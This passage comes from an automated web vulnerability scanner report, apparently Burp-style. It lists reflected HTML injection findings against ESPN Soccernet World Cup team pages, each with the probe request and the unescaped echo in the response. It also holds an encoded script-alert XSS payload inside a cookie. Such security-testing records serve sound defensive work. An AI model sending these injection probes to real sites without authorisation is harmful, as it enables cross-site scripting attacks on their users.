Last-Modified: Sat, 06 Nov 2010 23:28:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 06 Nov 2010 23:33:25 GMT
Content-Length: 81977
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Slovakia Football /
...[SNIP]...
<a href="/worldcup2010/team?team=468&_slug_=slovakiac9049"><a>2c9ee8a6c83&topId=803490&linktext=Dutch+ease+to+2-1+win+against+Slovakia">
...[SNIP]...

5.90. http://soccernet.espn.go.com/worldcup2010/team/_/team/468/slovakia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/468/slovakia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c864f"><a>dc103401107 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/468/slovakia?c864f"><a>dc103401107=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:25:17 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:25:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN07
Cache-Expires: Sat, 06 Nov 2010 23:30:17 GMT
Content-Length: 82085
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Slovakia Football /
...[SNIP]...
<a href="/worldcup2010/team?team=468&c864f"><a>dc103401107=1&_slug_=slovakia&c864f">
...[SNIP]...

5.91. http://soccernet.espn.go.com/worldcup2010/team/_/team/472/slovenia [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/472/slovenia

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69682"><a>ede52c78078 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/472/slovenia69682"><a>ede52c78078 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:12 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Sat, 06 Nov 2010 23:33:12 GMT
Content-Length: 81860
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Slovenia Football /
...[SNIP]...
<a href="/worldcup2010/team?team=472&_slug_=slovenia69682"><a>ede52c78078&topId=801122&linktext=Slovenia+come+to+terms+with+exit">
...[SNIP]...

5.92. http://soccernet.espn.go.com/worldcup2010/team/_/team/472/slovenia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/472/slovenia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64674"><a>258595f7676 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/472/slovenia?64674"><a>258595f7676=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:25:20 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:25:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN21
Cache-Expires: Sat, 06 Nov 2010 23:30:19 GMT
Content-Length: 81968
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Slovenia Football /
...[SNIP]...
<a href="/worldcup2010/team?team=472&64674"><a>258595f7676=1&_slug_=slovenia&64674">
...[SNIP]...

5.93. http://soccernet.espn.go.com/worldcup2010/team/_/team/475/switzerland [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/475/switzerland

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db0a"><a>888baac8773 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/475/switzerland4db0a"><a>888baac8773 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:58 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN31
Cache-Expires: Sat, 06 Nov 2010 23:33:58 GMT
Content-Length: 82022
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Switzerland Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=475&_slug_=switzerland4db0a"><a>888baac8773&topId=802287&linktext=Hitzfeld+says+pressure+cost+Swiss">
...[SNIP]...

5.94. http://soccernet.espn.go.com/worldcup2010/team/_/team/475/switzerland [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/475/switzerland

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f0d"><a>d5df743ea71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/475/switzerland?82f0d"><a>d5df743ea71=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:17 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 06 Nov 2010 23:33:17 GMT
Content-Length: 82130
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Switzerland Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=475&82f0d"><a>d5df743ea71=1&_slug_=switzerland&82f0d">
...[SNIP]...

5.95. http://soccernet.espn.go.com/worldcup2010/team/_/team/478/france [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/478/france

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa8c8"><a>f460e0de5a0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/478/francefa8c8"><a>f460e0de5a0 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:31 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN08
Cache-Expires: Sat, 06 Nov 2010 23:14:31 GMT
Content-Length: 80435
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>France Football / S
...[SNIP]...
<a href="/worldcup2010/team?team=478&_slug_=francefa8c8"><a>f460e0de5a0&topId=806664&linktext=New+France+coach+admits+concerns">
...[SNIP]...

5.96. http://soccernet.espn.go.com/worldcup2010/team/_/team/478/france [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/478/france

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80bf3"><a>247a72dcc41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/478/france?80bf3"><a>247a72dcc41=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:24 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN17
Cache-Expires: Sat, 06 Nov 2010 23:13:24 GMT
Content-Length: 80543
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>France Football / S
...[SNIP]...
<a href="/worldcup2010/team?team=478&80bf3"><a>247a72dcc41=1&_slug_=france&80bf3">
...[SNIP]...

5.97. http://soccernet.espn.go.com/worldcup2010/team/_/team/4789/ivory-coast [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/4789/ivory-coast

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a81a1"><a>b81a40a8bd9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/4789/ivory-coasta81a1"><a>b81a40a8bd9 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
